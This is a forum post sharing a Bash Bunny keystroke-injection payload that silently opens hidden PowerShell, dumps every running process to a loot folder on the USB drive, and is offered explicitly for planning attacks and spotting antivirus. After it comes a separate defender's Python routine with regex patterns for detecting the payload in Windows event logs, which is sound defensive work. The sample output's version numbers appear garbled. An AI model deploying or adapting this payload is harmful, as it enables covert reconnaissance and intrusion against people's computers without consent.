Decoy Posted April 1, 2017 (edited)

This is just a quick and dirty payload to return all running processes under the current user. This will return the path/filename/version, and quite a bit of other info as well. This information can be useful for planning future attacks, such as taking advantage of buffer overflows and other various vulnerabilities to gain a more permanent foothold into a target system. It can also be useful in identifying what AV is in use on a target system.

An example of useful process info:

Name : avpui
Id : 724
PriorityClass : Normal
FileVersion : 126.96.36.1993
Path : C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\avpui.exe
Company : AO Kaspersky Lab
CPU : 85.875
ProductVersion : 188.8.131.523
Description : Kaspersky Anti-Virus
Product : Kaspersky Anti-Virus

https://github.com/DeeKoy/bashbunny-payloads/tree/master/payloads/library/ProcessInfo

#!/bin/bash
#
# Title: Process Info
# Author: Decoy
# Version: 1.0
# Category: Recon
# Target: Windows XP SP3+ (PowerShell)
# Attackmodes: HID, Storage
#
#
# Amber Blink Fast.....Initialization
# Amber................Begin
# White Blinking.......Moving loot to mass storage
# Blue Blinking........Syncing File System
# Green................Finished

# Initialization
LED R G 100

# Create loot directory
mkdir -p /root/udisk/loot/ProcessInfo

# Runs minimized powershell gathering process information for potential future attack vectors
LED R G
ATTACKMODE HID STORAGE
QUACK DELAY 6000
QUACK GUI r
QUACK STRING "powershell -NoP -NonI -W Hidden"
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "\$Bunny = (gwmi win32_volume -f 'label=\"BashBunny\"' | Select-Object -ExpandProperty DriveLetter); Get-Process | Format-List -Property * | Out-File \$Bunny\\loot\\ProcessInfo\\ProcessInfo.txt; exit"
QUACK ENTER
LED R G B 100
sleep 1

# Sync File System
LED B 100
sync; sleep 1; sync

# Trap is clean
LED G

Edited April 1, 2017 by Decoy
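As an added example from the defender's side (not part of Decoy's post or the payload repository), the Python triage routine below runs over constructed records shaped like Windows process-creation (4688) and PowerShell script-block (4104) events and flags the two artefacts this payload leaves behind: a hidden, non-interactive PowerShell spawned from explorer.exe by the typed Run-dialog keystrokes, and a script block that resolves a drive letter from a volume label and writes a Get-Process listing to it. The event field names and the sample events are assumptions made for the example.

```python
import re

# Constructed sample events modelled on Security 4688 (process creation) and
# PowerShell 4104 (script block) records; not real captures. Events 0 and 1
# mirror the two strings the payload types; 2 and 3 are benign admin activity.
EVENTS = [
    {"id": 4688, "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell -NoP -NonI -W Hidden"},
    {"id": 4104, "script": "$Bunny = (gwmi win32_volume -f 'label=\"BashBunny\"' "
                           "| Select-Object -ExpandProperty DriveLetter); "
                           "Get-Process | Format-List -Property * "
                           "| Out-File $Bunny\\loot\\ProcessInfo\\ProcessInfo.txt; exit"},
    {"id": 4688, "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": "powershell -File C:\\scripts\\backup.ps1"},
    {"id": 4104, "script": "Get-Process | Where-Object CPU -gt 50"},
]

# Hidden window plus non-interactive host: nobody is meant to see this console
HIDDEN_WINDOW = re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I)
NON_INTERACTIVE = re.compile(r"-NonI(?:nteractive)?\b", re.I)
# Drive letter looked up by volume label (a removable loot drive) and a
# process inventory written out to a file
VOLUME_BY_LABEL = re.compile(r"win32_volume.*label=", re.I)
PROCESS_DUMP = re.compile(r"Get-Process.*(Out-File|Export-Csv|Set-Content|>)", re.I)


def triage(event):
    """Return the reasons this event matches the payload pattern, or [] if none."""
    reasons = []
    if event["id"] == 4688:
        cmd = event["cmd"]
        if HIDDEN_WINDOW.search(cmd) and NON_INTERACTIVE.search(cmd):
            reasons.append("hidden non-interactive PowerShell")
            # Launched from the shell itself: Run dialog or injected keystrokes
            if event["parent"].lower().endswith("explorer.exe"):
                reasons.append("spawned from explorer.exe (Run dialog / keystroke injection)")
    elif event["id"] == 4104:
        script = event["script"]
        if VOLUME_BY_LABEL.search(script):
            reasons.append("drive letter resolved from volume label")
        if PROCESS_DUMP.search(script):
            reasons.append("process listing written to file")
    return reasons


def find_suspicious(events):
    """Return (index, reasons) for every event with at least one hit."""
    hits = [(i, triage(e)) for i, e in enumerate(events)]
    return [(i, r) for i, r in hits if r]
```

Two hits on the same host within a few seconds, with the 4688 parent being explorer.exe, is the combination worth alerting on; either rule alone will also fire on legitimate administration.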